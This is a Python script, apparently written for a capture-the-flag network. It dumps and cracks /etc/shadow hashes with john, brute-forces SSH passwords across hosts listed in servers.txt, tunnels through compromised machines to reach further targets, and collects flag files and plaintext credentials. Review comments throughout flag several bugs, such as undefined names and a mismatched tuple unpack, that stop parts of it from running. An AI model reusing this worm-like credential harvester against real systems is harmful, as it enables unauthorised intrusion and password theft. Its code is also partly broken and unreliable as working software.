  1. #!/usr/bin/env python
  2. import os
  3. import paramiko
  4. import re
  5. import subprocess
  6. import sys
  7.  
# Module-global state shared by revisit2(), crack() and crack_john() below;
# every function mutates these in place rather than returning values.
# NOTE(review): indentation was lost in the paste and is reconstructed here.

# Matches one line of john's cracking output, "<password> (<username>)":
# group(1) is the password, group(2) the account name.  The pattern is a
# non-raw string, so "\S", "\s" and "\(" are invalid str escapes that newer
# Pythons flag with a warning.
CRED_REGEX = re.compile("^(\S+)\s+\((\S+)\)$")
FLAG_LOCS = {}   # host -> contents read from /flag.txt on that host
SEEN = []        # hosts on which some login succeeded (appended in crack())
REVISIT = []     # (host, pivot) pairs logged in as non-root; revisit2() retries them as root

NUM_SHDW = 0     # how many passwd/shadow copies were handed to crack_john()
NUM_SSHK = 0     # never read or written anywhere on this page

# Seed credential; both empty strings as pasted.
active_user = ""
active_pass = ""
# host -> list of (user, password) pairs that authenticated there; "SELF" is
# the local machine.  These are plaintext and are printed by the final summary.
creds = {
    "SELF": [(active_user, active_pass)]
}
usrs = [active_user]   # candidate usernames tried by crack(); grown by crack_john()
pwds = [active_pass]   # candidate passwords tried by crack()/revisit2(); grown by crack_john()

ip_temp = []   # host strings already queued, used to deduplicate ip
ip = []        # work queue of (host, pivot-host-or-None)
conn = {}      # host -> (transport-or-None, SSHClient) as returned by tunnel()
  27.  
def revisit2():
    """Retry every (host, pivot) pair in REVISIT as "root" with each password in pwds.

    On a successful login the client is stored in conn, the credential is
    recorded in creds, and the same three reads as the main loop are issued
    over the new session: ~/servers.txt (to extend the ip queue), /flag.txt
    (recorded in FLAG_LOCS) and /etc/shadow + /etc/passwd (handed to jack()).
    Pairs that succeeded are meant to be removed from REVISIT at the end.

    Returns None; all effects are on the module globals.

    NOTE(review): indentation was lost in the paste and is reconstructed
    here.  `jack` is not defined anywhere on this page.  Each attempt is a
    separate SSH password authentication against the target, so a burst of
    failed root logins from one source is the observable footprint.
    """
    global REVISIT, creds

    # Intended to collect the pairs that succeeded, for removal below.
    tmp = []
    for (ipa, wfrom) in REVISIT:
        for pwd in pwds:
            try:
                print("[*] *revisiting for root* Attempting login to %s with root/%s" % (ipa, pwd))
                if wfrom:
                    # conn values are 2-tuples everywhere else on this page, so
                    # this three-name unpack raises ValueError, which the
                    # except below prints and skips: pivoted revisits never
                    # get past this line as written.
                    (_, connection, sport) = conn[wfrom]
                    (tnl, cli) = tunnel(ipa, "root", pwd, connection)
                else:
                    (tnl, cli) = tunnel(ipa, "root", pwd)
                    # Placement is ambiguous after the paste; read as the
                    # direct-connection branch only.
                    connection = cli

                conn[ipa] = (tnl, cli)
                tmp.append((ipa, wfrom))
                print("[*] Login to %s succeeded" % (ipa))

                if ipa in creds.keys():
                    creds[ipa].append(("root", pwd))
                else:
                    creds[ipa] = [("root", pwd)]

                # `tmp` is rebound here to the command output, so the list of
                # succeeded pairs built above is lost and the cleanup loop at
                # the end iterates over file contents instead.
                (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
                tmp = stdout.read()

                if tmp:
                    print("[*] Found servers file on %s" % (ipa))

                    # Under Python 3 stdout.read() is bytes and .split("\n")
                    # raises TypeError; the shebang is an unversioned `python`.
                    for i in tmp.strip().split("\n"):
                        if i not in ip_temp:
                            ip.append((i, ipa))
                            ip_temp.append(i)

                    print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
                else:
                    print("[*] Servers file not found on %s" % (ipa))

                (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
                tmp = stdout.read()

                if tmp:
                    if ipa not in FLAG_LOCS.keys():
                        print("[!] Flag file found on %s, contents: \"%s\"" % (ipa, tmp))
                        FLAG_LOCS[ipa] = tmp
                    else:
                        print("[!] Flag file had been found before on %s" % (ipa))
                elif stderr.read():
                    print("[*] No flag file found on %s" % (ipa))

                # Pull the credential database of the host; both reads need
                # root on the target (/etc/shadow is root-only by default).
                (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
                shdw = stdout.read()
                (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
                pawd = stdout.read()

                jack(pawd, shdw)

            except Exception as e:
                # Any failure (auth, unpack, NameError on jack) is printed
                # and the next password is tried.
                print(e)
                continue

    # See the note on `tmp` above: after a successful login this iterates
    # the last file read, and REVISIT.remove() raises ValueError outside
    # any try.
    for i in tmp:
        REVISIT.remove(i)
  92.  
def tunnel(dst, usr, pwd, cli=None):
    """Open a paramiko SSHClient to dst ("host:port"), optionally through an existing session.

    Args:
        dst: "host:port" string; split on ":" and the port cast to int.
        usr: username for the new session.
        pwd: password for the new session (see NOTE below).
        cli: an already-connected paramiko.SSHClient to pivot through, or None.

    Returns:
        (transport, client): the pivot's Transport (None when connecting
        directly) and the newly connected SSHClient.

    Raises:
        Whatever paramiko raises on connect; callers catch Exception.

    NOTE(review): indentation was lost in the paste and is reconstructed
    here.  Both connect() calls pass `pw`, which is not bound anywhere in
    this function as pasted, so this raises NameError before connecting.
    """
    # Appends paramiko debug logging to ./log.txt on every call.
    paramiko.util.log_to_file("log.txt")
    dst_info = dst.split(":")
    dst_cli = paramiko.SSHClient()
    # AutoAddPolicy accepts any server host key without verification, so
    # a man-in-the-middle presenting a different key is not detected.
    dst_cli.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    if cli:
        # Pivot: request a forwarded channel from the existing session's
        # transport to dst and run the new SSH handshake over that channel.
        # The channel-type string is taken verbatim from the paste.
        t = cli.get_transport()
        chan = t.open_channel("direct-tcip", src_addr=("127.0.0.1", 22), dest_addr=(dst_info[0], int(dst_info[1])))
        dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw, sock=chan)
    else:
        t = None
        dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw)
    return (t, dst_cli)
  107.  
def crack(ipa, wfrom):
    """Try every (user, password) pair from usrs x pwds against host ipa.

    Args:
        ipa: "host:port" target string.
        wfrom: the host this target was learned from; if it has an entry in
            conn, the new session is tunnelled through that host's client.

    Returns:
        The username of the first successful login, or False if every pair
        failed.  Side effects on success: creds[ipa] gains the pair,
        conn[ipa] holds (transport, client), and ipa is appended to SEEN.

    NOTE(review): indentation was lost in the paste and is reconstructed
    here.  Every iteration is a full SSH password authentication, so a host
    with N candidate pairs sees up to N failed logins in quick succession
    from the same source before this returns.
    """
    global conn, creds

    for usr in usrs:
        for pwd in pwds:
            try:
                print("[*] Attempting login to %s with %s/%s" % (ipa, usr, pwd))
                # wfrom is None for first-hop targets, so the direct branch
                # is taken for those.
                if wfrom in conn.keys():
                    (_, connection) = conn[wfrom]
                    (tnl, cli) = tunnel(ipa, usr, pwd, connection)
                else:
                    (tnl, cli) = tunnel(ipa, usr, pwd)
                if ipa in creds.keys():
                    creds[ipa].append((usr, pwd))
                else:
                    creds[ipa] = [(usr, pwd)]
                conn[ipa] = (tnl, cli)
                SEEN.append(ipa)

                print("[*] Login to %s succeeded" % (ipa))
                return usr
            except Exception as e:
                # Every failure is swallowed silently; `e` is never inspected,
                # so connection errors and auth failures are indistinguishable.
                continue
    return False
  132.  
def crack_john(pwd, shdw):
    """Write passwd/shadow copies to the working directory, run unshadow + john, and extend usrs/pwds.

    Args:
        pwd: contents of a /etc/passwd file.
        shdw: contents of the matching /etc/shadow file.

    Returns:
        True if at least one new username or password was appended to the
        global usrs/pwds lists, else False.  Also increments NUM_SHDW.

    NOTE(review): indentation was lost in the paste and is reconstructed
    here.  The shell commands are fixed literals (nothing from the input is
    interpolated into them).  Plaintext copies of the credential files are
    written to the current directory as password.txt, shadow.txt and pwds;
    their removal is issued but not waited on, so they may remain on disk.
    """
    alter = False
    global usrs, pwds, NUM_SHDW
    NUM_SHDW += 1

    try:
        pfile = open("password.txt", "w")
        sfile = open("shadow.txt", "w")

        # str() on bytes input yields "b'...'" under Python 3.
        pfile.write(str(pwd))
        sfile.write(str(shdw))
        pfile.close()
        sfile.close()

        # Popen returns immediately and is never waited on, so john below
        # may start before unshadow has finished writing `pwds`.
        subprocess.Popen("unshadow password.txt shadow.txt > pwds", shell=True)
        result = subprocess.Popen("john pwds --wordlist=rockyou.txt", stdout=subprocess.PIPE, shell=True)

        for line in result.stdout.readlines():
            # Under Python 3 `line` is bytes and a str pattern raises TypeError.
            credentials = CRED_REGEX.match(line)
            if credentials:
                usr = credentials.group(2)
                if usr not in usrs:
                    usrs.append(usr)
                    alter = True
                # `creds` here is the module-level dict, not the match
                # object, so this raises AttributeError on the first match
                # and control falls to the except below.
                pas = creds.group(1)
                if pas not in pwds:
                    pwds.append(pas)
                    alter = True

        subprocess.Popen("rm password.txt shadow.txt pwds", shell=True)
        return alter
    except Exception as e:
        # On any error the temp files are not removed; alter may already be
        # True if a username was appended before the failure.
        print(e)
        print("Failed to crack passwords using john")
        return alter
  168.  
# Script body.  Reads ~/servers.txt as the initial target list, runs
# crack_john() on the local passwd/shadow (which requires root locally), then
# drains the ip queue: for each host, crack() tries the known credentials,
# and on success the host's ~/servers.txt, /flag.txt and /etc/shadow are read
# to grow the queue, the flag table and the credential lists.  A final
# summary prints counts and the full creds dict, including plaintext passwords.
# NOTE(review): indentation was lost in the paste and is reconstructed here.
# The `__main__` guard is commented out, so this runs on import as well.
#if __name__ == "__main__":
ip_list = subprocess.Popen("cat ~/servers.txt", stdout=subprocess.PIPE, shell=True)
print("[*] Read targets file")
# Under Python 3 stdout.read() is bytes and .split("\n") raises TypeError.
for i in ip_list.stdout.read().strip().split("\n"):
    ip.append((i, None))

# crack first password and store info to lists
shadow = subprocess.Popen("cat /etc/shadow", stdout=subprocess.PIPE, shell=True)
password = subprocess.Popen("cat /etc/passwd", stdout=subprocess.PIPE, shell=True)

# call to jack
crack_john(password.stdout.read(), shadow.stdout.read())

while(ip):
    curr,wfrom = ip.pop(0)
    user = crack(curr, wfrom)
    tmp = ""

    # ip and REVISIT hold (host, pivot) tuples while SEEN holds host strings,
    # so the difference only empties when both queues are empty; two hosts
    # that never authenticate are re-queued below and loop indefinitely.
    if not ((set(ip) | set(REVISIT)) - set(SEEN)):
        break

    try:
        if user:
            # check user
            if user != "root":
                REVISIT.append((curr, wfrom))

            (_, connection) = conn[curr]
            (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
            tmp = stdout.read()

            if tmp:
                print("[*] Found servers file on %s" % (curr))

                for i in tmp.strip().split("\n"):
                    if i not in ip_temp:
                        ip.append((i, curr))
                        ip_temp.append(i)
                print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
            else:
                print("[*] Servers file not found on %s" % (curr))

            (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
            f = stdout.read()

            if f:
                if curr not in FLAG_LOCS.keys():
                    print("[!] Flag file found on %s, contents: \"%s\"" % (curr, f))
                    FLAG_LOCS[curr] = f
                else:
                    print("[!] Flag file had been found before on %s" % (curr))

            elif stderr.read():
                print("[*] No flag file found on %s" % (curr))

            # Only a root session (or misconfigured permissions on the target)
            # returns content here; a non-root user gets stderr output instead.
            (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
            tmp = stdout.read()

            if tmp:
                (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
                print("[*] Dumping /etc/shadow")
                # `jack` is not defined on this page (crack_john is the only
                # cracker defined); this raises NameError into the except below.
                jack(stdout.read(), tmp)
                revisit2()
            elif stderr.read():
                # Format string has two %s placeholders but no arguments, so
                # the line is printed literally.
                print("[*] User %s on %s cannot access /etc/shadow")
        else:
            # Failed host goes to the back of the queue and is retried later.
            print("[*] %s back in line" % (curr))
            ip.append((curr, wfrom))
    except Exception as e:
        # All errors from the post-login reads are discarded silently.
        #print(e)
        continue

print("\n%s" % ("=" * 15))
print("Collected %s /etc/shadow files" % (str(NUM_SHDW)))
print("Cracked %s passwords" % (str(len(pwds))))
print("Found %s flag files" % (str(len(FLAG_LOCS.keys()))))
# Prints every recovered (user, password) pair in plaintext to stdout.
print("Accessed following ips: %s" % (str(creds)))